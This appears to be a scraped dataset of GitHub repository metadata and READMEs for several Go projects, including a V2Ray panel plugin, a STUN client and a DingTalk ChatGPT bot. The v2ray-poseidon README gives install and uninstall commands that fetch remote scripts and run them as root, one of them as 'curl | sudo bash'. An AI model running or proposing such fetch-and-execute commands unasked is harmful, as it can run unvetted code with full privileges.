TITLE, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT. THE LICENSOR DOES NOT PROVIDE ANY WARRANTY AS TO QUALITY, SUITABILITY, FEATURES, COMPATIBILITY OF THE webBenchmark AND RELATED SERVICES. THIS AGREEMENT DOES NOT PROVIDE ANY REPRESENTATION OR WARRANTY OR LIABILITY AS TO ANY THIRD-PARTY SOFTWARE.\n\n**10. Third Party Software Disclaimer**\n\nThe webBenchmark may make reference to third party standard software (e.g. open source software and video test streams) which is not developed by Licensor, but which are provided in connection with the Purpose of the integration or testing of the maintell. For the avoidance of doubt, Licensor is not a sub licensor of such third party software. Licensor refers Licensee to applicable attribution files and license terms disclosures and pertinent terms of the respective third-party standard software publisher which apply directly to Licensee. However, Parties will ensure their compliance with such relevant licensing terms.\n\nTHIS THIRD-PARTY SOFTWARE IS PROVIDED BY THE RESPECTIVE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS THIRD PARTY SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n**11. Limitation of Liability.**\n\nYou are solely responsible or liable for determining the appropriateness of Using the webBenchmark AND RELATED SERVICES and assume any risks associated with Your exercise of permissions under this License and the creation of Derivative Works. Licensor shall have no liability of any kind with regards TO such Derivative Works.\n\nIn no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall Licensor be liable to You for damages OF ANY KIND, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the webBenchmark or Derivative Works, including but not limited to damages for loss of goodwill, LOST REVENUE, LOST PROFIT, LOST DATA OR CORRUPTED DATA, COSTS OF PROCUREMENT FOR SUBSTITUTION OF PRODUCTS OR SERVICES, THIRD PARTY SOFTWARE AND CLAIMS, PROVIDED INFORMATION, WASTED MANAGEMENT TIME, LOSS OF USE OF COMPUTER SYSTEMS AND RELATED EQUIPMENT, COMPUTER FAILURE AND MALFUNCTIONS, DOWNTIME COST, work stoppage, or any and all other commercial damages or losses, even if such the Licensor or the Contributor has been advised of the possibility of such damages.\n\nTHE PROVISIONS OF THIS CLAUSE TITLED \"LIMITATION OF LIABILITY\" SHALL NOT APPLY TO THE EXTENT RESTRICTED OR PREVENTED BY MANDATORY APPLICABLE LAW THAT CANNOT BE AMENDED OR EXCLUDED BY CONTRACTUAL WAIVER SUCH AS DELIBERATE ACTS AND FRAUD.\n\n**12. Derivative Work**\n\nWhile creating and using Derivative Works, if you choose to offer additional warranty, indemnity, or other liability obligations and/or rights inconsistent with this License, You act only on Your own behalf and on Your sole responsibility, not on behalf of the Licensor. You agree to indemnify, defend, and hold the Licensor harmless for any liability incurred by, or claims asserted against, the Licensor by reason of your accepting any such warranty or additional obligations and liability.\n\n**13. Third Parties**\n\nThe Licensor will not indemnify nor hold harmless You against any infringements of any rights of third parties with respect to the webBenchmark or the Derivative Works.\n\nLicensor shall have no obligation for payment of royalties or any other compensation to You or third parties, if any, with respect to the Use of the webBenchmark by You or Your customers, clients, viewers, listeners for playing media content or in connection with third party products and software. You will be exclusively responsible for payment of royalties to third parties.\n\n**14. Legal Capacity**\n\nBy accepting this License, You represent and warrant to have the legal capacity and authority to enter into this legally binding License.\n\n**15. 
No Implied Rights**\n\nOther than expressly provided for in this License, nothing in this License grants or shall be construed to grant to any Party any right and/or any license to any Intellectual Property Right or application therefore (including but not limited to patent applications or patents) which are held by and/or in the name of the other Party and/or which are controlled by the other Party, or to any Confidential Information received from the other Party.\n\n**16. Indemnification**\n\nYou agree, at Licensor's option, to release, defend, indemnify, and hold Licensor and its affiliates and subsidiaries, and their officers, directors, employees, contractors and agents, harmless from and against any claims, liabilities, damages, losses, and expenses, including, without limitation, reasonable legal and accounting fees, arising out of or in any way connected with (i) Your breach of this License (ii) Your negligent or improper use, misuse or intentional omission in connection with the use of the webBenchmark or any of Licensor's services.\n\n**17. Notices**\n\nAll notices or other communication required or permitted to be given in writing under this License must be given in the English and Chinese language by email.\n\n**18. Waivers**\n\nNo failure or delay by any Party in exercising any right or remedy provided by law or pursuant to this License will impair such right or remedy or be construed as a waiver of it and will not preclude its exercise at any subsequent time and no single or partial exercise of any such right or remedy will preclude any further exercise of it or the exercise of any other remedy.\n\n**19. Severability**\n\nIf any provision of this License or of any of the documents contemplated in it is held to be invalid or unenforceable, then such provision will (so far as it is invalid or unenforceable) have no effect and will be deemed not to be included in this License or the relevant document, but without invalidating any of the remaining provisions of this License or that document. The Parties must then use all reasonable endeavors to replace the invalid or unenforceable provision by a valid and enforceable substitute provision the effect of which is as close as possible to the intended effect of the invalid or unenforceable provision.\n\n**20. Modifications**\n\nThe Licensor may modify the terms of this License in its sole discretion and such modifications shall take effect and be binding on You on the earliest date which they are posted to the Platform. No one other than the Licensor has the right to modify this License.\n\n**21. GOVERNING LAW AND JURISDICTION**\n\nThe License is governed by and must be construed, interpreted in accordance with the laws of CHINA without given effect to the conflict of law principles thereof. The courts of CHINA have exclusive jurisdiction over any dispute, legal action and proceedings arising out of or related to the License, including its termination, which shall be binding and enforceable upon the Parties worldwide. In the event of any proceeding or litigation arising out of this License, the prevailing Party shall be entitled to recover from the non-prevailing Party its legal fees, court fees and related costs to the extent and in ratio of its success. 
Notwithstanding the foregoing, Licensor may bring legal actions against You in the country where You has its seat, if it deems necessary for the enforceability of its rights regarding payments by You under the License.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ColetteContreras/v2ray-poseidon", "link": "https://github.com/ColetteContreras/v2ray-poseidon", "tags": ["v2ray", "ssrpanel", "plugin", "v2board", "sspanel", "v2ray-poseidon", "sspanel-v3", "sspanel-uim"], "stars": 557, "description": "An Enhanced V2Ray(based on v2ray-core) for VNetPanel, SSRPanel, V2board and SSPanel-v3-Uim to sync users from database to v2ray, to log traffics/system info", "lang": "Go", "repo_lang": "", "readme": "# Poseidon -- An Enhanced V2Ray(based on v2ray-core)\n\n# \u6ce8\u610f\uff1a\u672c\u9879\u76ee\u5df2\u4e8e 2021\u5e74\u4e0b\u7ebf\uff0c\u6ca1\u6709\u4efb\u4f55Telegram\u5e10\u6237\uff0c\u4e5f\u6ca1\u6709\u4efb\u4f55\u9500\u552e\u4eba\u5458,\u6240\u6709\u4ee5 Poseidon \u6ce2\u585e\u51ac\u540d\u4e49\u7684\u5747\u4e3a\u9a97\u5b50\uff0c\u8bf7\u52ff\u76f8\u4fe1\uff0c\u76ee\u524d\u5df2\u6709\u4eba\u88ab\u9a97\n# \u6ce8\u610f\uff1a\u672c\u9879\u76ee\u5df2\u4e8e 2021\u5e74\u4e0b\u7ebf\uff0c\u6ca1\u6709\u4efb\u4f55Telegram\u5e10\u6237\uff0c\u4e5f\u6ca1\u6709\u4efb\u4f55\u9500\u552e\u4eba\u5458,\u6240\u6709\u4ee5 Poseidon \u6ce2\u585e\u51ac\u540d\u4e49\u7684\u5747\u4e3a\u9a97\u5b50\uff0c\u8bf7\u52ff\u76f8\u4fe1\uff0c\u76ee\u524d\u5df2\u6709\u4eba\u88ab\u9a97\n# \u6ce8\u610f\uff1a\u672c\u9879\u76ee\u5df2\u4e8e 2021\u5e74\u4e0b\u7ebf\uff0c\u6ca1\u6709\u4efb\u4f55Telegram\u5e10\u6237\uff0c\u4e5f\u6ca1\u6709\u4efb\u4f55\u9500\u552e\u4eba\u5458,\u6240\u6709\u4ee5 Poseidon \u6ce2\u585e\u51ac\u540d\u4e49\u7684\u5747\u4e3a\u9a97\u5b50\uff0c\u8bf7\u52ff\u76f8\u4fe1\uff0c\u76ee\u524d\u5df2\u6709\u4eba\u88ab\u9a97\n#\n# \u4f5c\u8005\u552f\u4e00\u90ae\u7bb1\uff08\u6240\u6709\u8d2d\u4e70\u8fc7\u7684\uff0c\u5747\u53ef\u53d1\u9001\u90ae\u4ef6\u514d\u8d39\u83b7\u53d6\u6c38\u4e45\u79bb\u7ebf\u6388\u6743\uff0c\u9700\u8981\u63d0\u4f9b\u539f\u6388\u6743\u7801\u53ca\u57df\u540d\u7b49\u4fe1\u606f\uff0c\u56de\u590d\u5468\u671f\u4e00\u4e2a\u6708\u4ee5\u5185\uff0c\u4e00\u5c01\u5982\u679c\u672a\u56de\u590d\u53ef\u8fc7\u4e00\u5468\u518d\u53d1\u4e00\u6b21\uff09 ColetteContreras@outlook.com\nSupport SSRPanel(VNetPanel), V2board, SSpanel-v3-Uim\n\n### Features\n\n- Sync user from your panel to v2ray\n- Log user traffic\n- Limit traffic rate ( speed limit )\n- Limit online IP count\n- And other optimizations\n\n### Benefits\n\n- No other requirements\n - It's able to run if you could launch v2ray core\n- Less memory usage\n - It just takes about 5MB to 10MB memories more than v2ray core\n - Small RAM VPS would be joyful\n- Simplicity configuration\n\n\n### Install on Linux\n\n```\ncurl -o go.sh -L -s https://raw.githubusercontent.com/ColetteContreras/v2ray-poseidon/master/install-release.sh\nsudo bash go.sh # Install latest version of v2ray-poseidon\nOR\nsudo bash go.sh --version v1.5.3 # Install target version of v2ray-poseidon\n```\n\n#### Uninstall\n\n```\ncurl -L -s https://raw.githubusercontent.com/ColetteContreras/v2ray-poseidon/master/uninstall.sh | sudo bash\n```\n\n### Contact\n\nGet in touch via [TG group: v2ray_poseidon](https://t.me/v2ray_poseidon)\n\n### Acknowledgement\n\n- [V2ray](https://github.com/v2ray/v2ray-core)\n- [SSRPanel](https://github.com/ssrpanel/SSRPanel)\n- [V2board](https://github.com/v2board/v2board)\n- 
[SSPanel-v3-Uim](https://github.com/Anankke/SSPanel-Uim)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/aws-efs-csi-driver", "link": "https://github.com/kubernetes-sigs/aws-efs-csi-driver", "tags": ["aws", "efs", "csi", "kubernetes", "k8s-sig-aws"], "stars": 557, "description": "CSI Driver for Amazon EFS https://aws.amazon.com/efs/", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kavu/go_reuseport", "link": "https://github.com/kavu/go_reuseport", "tags": ["go"], "stars": 556, "description": "Brings SO_REUSEPORT into your Go server", "lang": "Go", "repo_lang": "", "readme": "# GO_REUSEPORT\n\n[![Build Status](https://travis-ci.org/kavu/go_reuseport.png?branch=master)](https://travis-ci.org/kavu/go_reuseport)\n[![codecov](https://codecov.io/gh/kavu/go_reuseport/branch/master/graph/badge.svg)](https://codecov.io/gh/kavu/go_reuseport)\n[![GoDoc](https://godoc.org/github.com/kavu/go_reuseport?status.png)](https://godoc.org/github.com/kavu/go_reuseport)\n\n**GO_REUSEPORT** is a little expirement to create a `net.Listener` that supports [SO_REUSEPORT](http://lwn.net/Articles/542629/) socket option.\n\nFor now, Darwin and Linux (from 3.9) systems are supported. I'll be pleased if you'll test other systems and tell me the results.\n documentation on [godoc.org](http://godoc.org/github.com/kavu/go_reuseport \"go_reuseport documentation\").\n\n## Example ##\n\n```go\npackage main\n\nimport (\n \"fmt\"\n \"html\"\n \"net/http\"\n \"os\"\n \"runtime\"\n \"github.com/kavu/go_reuseport\"\n)\n\nfunc main() {\n listener, err := reuseport.Listen(\"tcp\", \"localhost:8881\")\n if err != nil {\n panic(err)\n }\n defer listener.Close()\n\n server := &http.Server{}\n http.HandleFunc(\"/\", func(w http.ResponseWriter, r *http.Request) {\n fmt.Println(os.Getgid())\n fmt.Fprintf(w, \"Hello, %q\\n\", html.EscapeString(r.URL.Path))\n })\n\n panic(server.Serve(listener))\n}\n```\n\nNow you can run several instances of this tiny server without `Address already in use` errors.\n\n## Thanks\n\nInspired by [Artur Siekielski](https://github.com/aartur) [post](http://freeprogrammersblog.vhex.net/post/linux-39-introdued-new-way-of-writing-socket-servers/2) about `SO_REUSEPORT`.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ccding/go-stun", "link": "https://github.com/ccding/go-stun", "tags": ["stun", "go", "nat-traversal", "rfc-5389", "webrtc", "golang"], "stars": 556, "description": "A go implementation of the STUN client (RFC 3489 and RFC 5389)", "lang": "Go", "repo_lang": "", "readme": "go-stun\n=======\n\n[![Build Status](https://travis-ci.org/ccding/go-stun.svg?branch=master)](https://travis-ci.org/ccding/go-stun)\n[![License](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://opensource.org/licenses/Apache-2.0)\n[![GoDoc](https://godoc.org/github.com/ccding/go-stun?status.svg)](http://godoc.org/github.com/ccding/go-stun/stun)\n[![Go Report Card](https://goreportcard.com/badge/github.com/ccding/go-stun)](https://goreportcard.com/report/github.com/ccding/go-stun)\n\ngo-stun is a STUN (RFC 3489, 5389) client implementation in golang\n(a.k.a. 
UDP hole punching).\n\n[RFC 3489](https://tools.ietf.org/html/rfc3489):\nSTUN - Simple Traversal of User Datagram Protocol (UDP)\nThrough Network Address Translators (NATs)\n\n[RFC 5389](https://tools.ietf.org/html/rfc5389):\nSession Traversal Utilities for NAT (STUN)\n\n### Use the Command Line Tool\n\nSimply run these commands (if you have installed golang and set `$GOPATH`)\n```\ngo get github.com/ccding/go-stun\ngo-stun\n```\nor clone this repo and run these commands\n```\ngo build\n./go-stun\n```\nYou will get the output like\n```\nNAT Type: Full cone NAT\nExternal IP Family: 1\nExternal IP: 166.111.4.100\nExternal Port: 23009\n```\nYou can use `-s` flag to use another STUN server, and use `-v` to work on\nverbose mode.\n```bash\n> ./go-stun --help\nUsage of ./go-stun:\n -s string\n server address (default \"stun1.l.google.com:19302\")\n -v verbose mode\n```\n\n### Use the Library\n\nThe library `github.com/ccding/go-stun/stun` is extremely easy to use -- just\none line of code.\n\n```go\nimport \"github.com/ccding/go-stun/stun\"\n\nfunc main() {\n\tnat, host, err := stun.NewClient().Discover()\n}\n```\n\nMore details please go to `main.go` and [GoDoc](http://godoc.org/github.com/ccding/go-stun/stun)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "elliotchance/orderedmap", "link": "https://github.com/elliotchance/orderedmap", "tags": ["golang", "data-structures", "maps", "orderedmap"], "stars": 556, "description": "\ud83d\udd03 An ordered map in Go with amortized O(1) for Set, Get, Delete and Len.", "lang": "Go", "repo_lang": "", "readme": "# \ud83d\udd03 github.com/elliotchance/orderedmap/v2 [![GoDoc](https://godoc.org/github.com/elliotchance/orderedmap/v2?status.svg)](https://godoc.org/github.com/elliotchance/orderedmap/v2)\n\n## Basic Usage\n\nAn `*OrderedMap` is a high performance ordered map that maintains amortized O(1)\nfor `Set`, `Get`, `Delete` and `Len`:\n\n```go\nimport \"github.com/elliotchance/orderedmap/v2\"\n\nfunc main() {\n\tm := orderedmap.NewOrderedMap[string, any]()\n\n\tm.Set(\"foo\", \"bar\")\n\tm.Set(\"qux\", 1.23)\n\tm.Set(\"123\", true)\n\n\tm.Delete(\"qux\")\n}\n```\n\n*Note: v2 requires Go v1.18 for generics.* If you need to support Go 1.17 or\nbelow, you can use v1.\n\nInternally an `*OrderedMap` uses the composite type\n[map](https://go.dev/blog/maps) combined with a\ntrimmed down linked list to maintain the order.\n\n## Iterating\n\nBe careful using `Keys()` as it will create a copy of all of the keys so it's\nonly suitable for a small number of items:\n\n```go\nfor _, key := range m.Keys() {\n\tvalue, _:= m.Get(key)\n\tfmt.Println(key, value)\n}\n```\n\nFor larger maps you should use `Front()` or `Back()` to iterate per element:\n\n```go\n// Iterate through all elements from oldest to newest:\nfor el := m.Front(); el != nil; el = el.Next() {\n fmt.Println(el.Key, el.Value)\n}\n\n// You can also use Back and Prev to iterate in reverse:\nfor el := m.Back(); el != nil; el = el.Prev() {\n fmt.Println(el.Key, el.Value)\n}\n```\n\nThe iterator is safe to use bidirectionally, and will return `nil` once it goes\nbeyond the first or last item.\n\nIf the map is changing while the iteration is in-flight it may produce\nunexpected behavior.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eryajf/chatgpt-dingtalk", "link": "https://github.com/eryajf/chatgpt-dingtalk", "tags": ["chatgpt", "chatgpt-api", 
"dingtalk", "dingtalk-robot"], "stars": 557, "description": "ChatGPT\u673a\u5668\u4eba\u5728\u9489\u9489\u7fa4\u804a\u4e2d\u4ea4\u4e92", "lang": "Go", "repo_lang": "", "readme": "
\n

ChatGPT Dingtalk

\n\n[![Auth](https://img.shields.io/badge/Auth-eryajf-ff69b4)](https://github.com/eryajf)\n[![Go Version](https://img.shields.io/github/go-mod/go-version/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk)\n[![GitHub Pull Requests](https://img.shields.io/github/issues-pr/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk/pulls)\n[![GitHub Pull Requests](https://img.shields.io/github/stars/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk/stargazers)\n[![HitCount](https://views.whatilearened.today/views/github/eryajf/chatgpt-dingtalk.svg)](https://github.com/eryajf/chatgpt-dingtalk)\n[![Docker Image Size (latest by date)](https://img.shields.io/docker/image-size/eryajf/chatgpt-dingtalk)](https://hub.docker.com/r/eryajf/chatgpt-dingtalk)\n[![Docker Pulls](https://img.shields.io/docker/pulls/eryajf/chatgpt-dingtalk)](https://hub.docker.com/r/eryajf/chatgpt-dingtalk)\n[![GitHub license](https://img.shields.io/github/license/eryajf/chatgpt-dingtalk)](https://github.com/eryajf/chatgpt-dingtalk/blob/main/LICENSE)\n\n

\ud83c\udf09 \u5728\u9489\u9489\u7fa4\u804a\u4e2d\u6dfb\u52a0ChatGPT\u673a\u5668\u4eba \ud83c\udf09

\n\n\n

\n\n\n## \u524d\u8a00\n\n\u6700\u8fd1ChatGPT\u5f02\u5e38\u706b\u7206\uff0c\u672c\u9879\u76ee\u53ef\u4ee5\u52a9\u4f60\u5c06GPT\u673a\u5668\u4eba\u96c6\u6210\u5230\u9489\u9489\u7fa4\u804a\u4e2d\u3002\n\n\n> \ud83e\udd73 **\u6b22\u8fce\u5173\u6ce8\u6211\u7684\u5176\u4ed6\u5f00\u6e90\u9879\u76ee\uff1a**\n>\n> - [Go-Ldap-Admin](https://github.com/eryajf/go-ldap-admin)\uff1a\ud83c\udf09 \u57fa\u4e8eGo+Vue\u5b9e\u73b0\u7684openLDAP\u540e\u53f0\u7ba1\u7406\u9879\u76ee\u3002\n> - [learning-weekly](https://github.com/eryajf/learning-weekly)\uff1a\ud83d\udcdd \u5468\u520a\u5185\u5bb9\u4ee5\u8fd0\u7ef4\u6280\u672f\u548cGo\u8bed\u8a00\u5468\u8fb9\u4e3a\u4e3b\uff0c\u8f85\u4ee5GitHub\u4e0a\u4f18\u79c0\u9879\u76ee\u6216\u4ed6\u4eba\u4f18\u79c0\u7ecf\u9a8c\u3002\n> - [HowToStartOpenSource](https://github.com/eryajf/HowToStartOpenSource)\uff1a\ud83c\udf08 GitHub\u5f00\u6e90\u9879\u76ee\u7ef4\u62a4\u534f\u540c\u6307\u5357\u3002\n> - [read-list](https://github.com/eryajf/read-list)\uff1a\ud83d\udcd6 \u4f18\u8d28\u5185\u5bb9\u8ba2\u9605\uff0c\u9605\u8bfb\u65b9\u4e3a\u6839\u672c\n> - [awesome-github-profile-readme-chinese](https://github.com/eryajf/awesome-github-profile-readme-chinese)\uff1a\ud83e\udda9 \u4f18\u79c0\u7684\u4e2d\u6587\u533a\u4e2a\u4eba\u4e3b\u9875\u641c\u96c6\n\n\n## \u529f\u80fd\u7b80\u4ecb\n\n* \u652f\u6301\u5728\u9489\u9489\u7fa4\u804a\u4e2d\u6dfb\u52a0\u673a\u5668\u4eba\uff0c\u901a\u8fc7@\u673a\u5668\u4eba\u8fdb\u884c\u804a\u5929\u4ea4\u4e92\u3002\n* \u63d0\u95ee\u652f\u6301\u5355\u804a\u4e0e\u4e32\u804a\u4e24\u79cd\u6a21\u5f0f\uff0c\u901a\u8fc7@\u673a\u5668\u4eba\u53d1\u5173\u952e\u5b57\u5207\u6362\u3002\n\n## \u4f7f\u7528\u524d\u63d0\n\n* \u6709Openai\u8d26\u53f7\uff0c\u5e76\u4e14\u521b\u5efa\u597d`api_key`\uff0c\u6ce8\u518c\u76f8\u5173\u4e8b\u9879\u53ef\u4ee5\u53c2\u8003[\u6b64\u6587\u7ae0](https://juejin.cn/post/7173447848292253704) \u3002\u8bbf\u95ee[\u8fd9\u91cc](https://beta.openai.com/account/api-keys)\uff0c\u7533\u8bf7\u4e2a\u4eba\u79d8\u94a5\u3002\n* \u5728\u9489\u9489\u5f00\u53d1\u8005\u540e\u53f0\u521b\u5efa\u673a\u5668\u4eba\uff0c\u914d\u7f6e\u5e94\u7528\u7a0b\u5e8f\u56de\u8c03\u3002\n\n## \u4f7f\u7528\u6559\u7a0b\n\n### \u7b2c\u4e00\u6b65\uff0c\u5148\u521b\u5efa\u673a\u5668\u4eba\n\n\u521b\u5efa\u6b65\u9aa4\u53c2\u8003\u6587\u6863\uff1a[\u4f01\u4e1a\u5185\u90e8\u5f00\u53d1\u673a\u5668\u4eba](https://open.dingtalk.com/document/robots/enterprise-created-chatbot)\uff0c\u6216\u8005\u6839\u636e\u5982\u4e0b\u6b65\u9aa4\u8fdb\u884c\u914d\u7f6e\u3002\n\n1. \u521b\u5efa\u673a\u5668\u4eba\u3002\n ![image_20221209_163616](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163616.png)\n\n > `\ud83d\udce2 \u6ce8\u610f1\uff1a`\u53ef\u80fd\u73b0\u5728\u521b\u5efa\u673a\u5668\u4eba\u7684\u65f6\u5019\u540d\u5b57\u4e3a`chatgpt`\u4f1a\u88ab\u9489\u9489\u9650\u5236\uff0c\u8bf7\u7528\u5176\u4ed6\u540d\u5b57\u547d\u540d\u3002\n > `\ud83d\udce2 \u6ce8\u610f2\uff1a`\u7b2c\u56db\u6b65\u9aa4\u70b9\u51fb\u521b\u5efa\u5e94\u7528\u7684\u65f6\u5019\uff0c\u52a1\u5fc5\u9009\u62e9\u4f7f\u7528\u65e7\u7248\uff0c\u4ece\u800c\u521b\u5efa\u65e7\u7248\u673a\u5668\u4eba\u3002\n\n \u6b65\u9aa4\u6bd4\u8f83\u7b80\u5355\uff0c\u8fd9\u91cc\u5c31\u4e0d\u8d58\u8ff0\u4e86\u3002\n\n2. 
\u914d\u7f6e\u673a\u5668\u4eba\u56de\u8c03\u63a5\u53e3\u3002\n ![image_20221209_163652](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163652.png)\n\n \u521b\u5efa\u5b8c\u6bd5\u4e4b\u540e\uff0c\u70b9\u51fb\u673a\u5668\u4eba\u5f00\u53d1\u7ba1\u7406\uff0c\u7136\u540e\u914d\u7f6e\u5c06\u8981\u90e8\u7f72\u7684\u670d\u52a1\u6240\u5728\u670d\u52a1\u5668\u7684\u51fa\u53e3IP\uff0c\u4ee5\u53ca\u5c06\u8981\u7ed9\u670d\u52a1\u914d\u7f6e\u7684\u57df\u540d\u3002\n\n3. \u53d1\u5e03\u673a\u5668\u4eba\u3002\n ![image_20221209_163709](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163709.png)\n\n \u70b9\u51fb\u7248\u672c\u7ba1\u7406\u4e0e\u53d1\u5e03\uff0c\u7136\u540e\u70b9\u51fb\u4e0a\u7ebf\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u80fd\u5728\u9489\u9489\u7684\u7fa4\u91cc\u4e2d\u6dfb\u52a0\u8fd9\u4e2a\u673a\u5668\u4eba\u4e86\u3002\n\n4. \u7fa4\u804a\u6dfb\u52a0\u673a\u5668\u4eba\u3002\n\n ![image_20221209_163724](https://cdn.staticaly.com/gh/eryajf/tu/main/img/image_20221209_163724.png)\n\n### \u7b2c\u4e8c\u6b65\uff0c\u90e8\u7f72\u5e94\u7528\n\n\u4f60\u53ef\u4ee5\u4f7f\u7528docker\u5feb\u901f\u8fd0\u884c\u672c\u9879\u76ee\u3002\n\n`\u7b2c\u4e00\u79cd\uff1a\u57fa\u4e8e\u73af\u5883\u53d8\u91cf\u8fd0\u884c`\n\n```sh\n# \u8fd0\u884c\u9879\u76ee\n$ docker run -itd --name chatgpt -p 8090:8090 -e APIKEY=\u6362\u6210\u4f60\u7684key -e SESSION_TIMEOUT=600 --restart=always dockerproxy.com/eryajf/chatgpt-dingtalk:latest\n```\n\n\u8fd0\u884c\u547d\u4ee4\u4e2d\u6620\u5c04\u7684\u914d\u7f6e\u6587\u4ef6\u53c2\u8003\u4e0b\u8fb9\u7684\u914d\u7f6e\u6587\u4ef6\u8bf4\u660e\u3002\n\n`\u7b2c\u4e8c\u79cd\uff1a\u57fa\u4e8e\u914d\u7f6e\u6587\u4ef6\u6302\u8f7d\u8fd0\u884c`\n\n```sh\n# \u590d\u5236\u914d\u7f6e\u6587\u4ef6\uff0c\u6839\u636e\u81ea\u5df1\u5b9e\u9645\u60c5\u51b5\uff0c\u8c03\u6574\u914d\u7f6e\u91cc\u7684\u5185\u5bb9\n$ cp config.dev.json config.json # \u5176\u4e2d config.dev.json \u4ece\u9879\u76ee\u7684\u6839\u76ee\u5f55\u83b7\u53d6\n\n# \u8fd0\u884c\u9879\u76ee\n$ docker run -itd --name chatgpt -p 8090:8090 -v `pwd`/config.json:/app/config.json --restart=always dockerproxy.com/eryajf/chatgpt-dingtalk:latest\n```\n\n\u5176\u4e2d\u914d\u7f6e\u6587\u4ef6\u53c2\u8003\u4e0b\u8fb9\u7684\u914d\u7f6e\u6587\u4ef6\u8bf4\u660e\u3002\n\n\u6ce8\u610f\uff0c\u4e0d\u8bba\u901a\u8fc7\u4e0a\u8fb9\u54ea\u79cddocker\u65b9\u5f0f\u90e8\u7f72\uff0c\u90fd\u9700\u8981\u914d\u7f6eNginx\u4ee3\u7406\uff0c\u5f53\u7136\u4f60\u76f4\u63a5\u901a\u8fc7\u670d\u52a1\u5668\u5916\u7f51IP\u4e5f\u53ef\u4ee5\u3002\n\n\u90e8\u7f72\u5b8c\u6210\u4e4b\u540e\uff0c\u901a\u8fc7Nginx\u4ee3\u7406\u672c\u670d\u52a1\uff1a\n\n```nginx\nserver {\n listen 80;\n server_name chat.eryajf.net;\n\n client_header_timeout 120s;\n client_body_timeout 120s;\n\n location / {\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n proxy_set_header X-Forwarded-Proto $scheme;\n proxy_set_header X-Forwarded-For $remote_addr;\n proxy_pass http://localhost:8090;\n }\n}\n```\n\n\u90e8\u7f72\u5b8c\u6210\u4e4b\u540e\uff0c\u5c31\u53ef\u4ee5\u5728\u7fa4\u91cc\u827e\u7279\u673a\u5668\u4eba\u8fdb\u884c\u4f53\u9a8c\u4e86\u3002\n\nNginx\u914d\u7f6e\u5b8c\u6bd5\u4e4b\u540e\uff0c\u53ef\u4ee5\u5148\u624b\u52a8\u8bf7\u6c42\u4e00\u4e0b\uff0c\u901a\u8fc7\u670d\u52a1\u65e5\u5fd7\u8f93\u51fa\u5224\u65ad\u670d\u52a1\u662f\u5426\u6b63\u5e38\u53ef\u7528\uff1a\n\n```sh\n$ curl --location --request POST 'http://chat.eryajf.net/' \\\n --header 'Content-type: application/json' \\\n --data-raw '{\n \"conversationId\": \"xxx\",\n \"atUsers\": [\n {\n \"dingtalkId\": 
\"xxx\",\n \"staffId\":\"xxx\"\n }\n ],\n \"chatbotCorpId\": \"dinge8a565xxxx\",\n \"chatbotUserId\": \"$:LWCP_v1:$Cxxxxx\",\n \"msgId\": \"msg0xxxxx\",\n \"senderNick\": \"eryajf\",\n \"isAdmin\": true,\n \"senderStaffId\": \"user123\",\n \"sessionWebhookExpiredTime\": 1613635652738,\n \"createAt\": 1613630252678,\n \"senderCorpId\": \"dinge8a565xxxx\",\n \"conversationType\": \"2\",\n \"senderId\": \"$:LWCP_v1:$Ff09GIxxxxx\",\n \"conversationTitle\": \"\u673a\u5668\u4eba\u6d4b\u8bd5-TEST\",\n \"isInAtList\": true,\n \"sessionWebhook\": \"https://oapi.dingtalk.com/robot/sendBySession?session=xxxxx\",\n \"text\": {\n \"content\": \" \u4f60\u597d\"\n },\n \"msgtype\": \"text\"\n}'\n```\n\n\u5982\u679c\u624b\u52a8\u8bf7\u6c42\u6ca1\u6709\u95ee\u9898\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u5728\u9489\u9489\u7fa4\u91cc\u4e0e\u673a\u5668\u4eba\u8fdb\u884c\u5bf9\u8bdd\u4e86\u3002\n\n`\u5e2e\u52a9\u5217\u8868`\n\n> 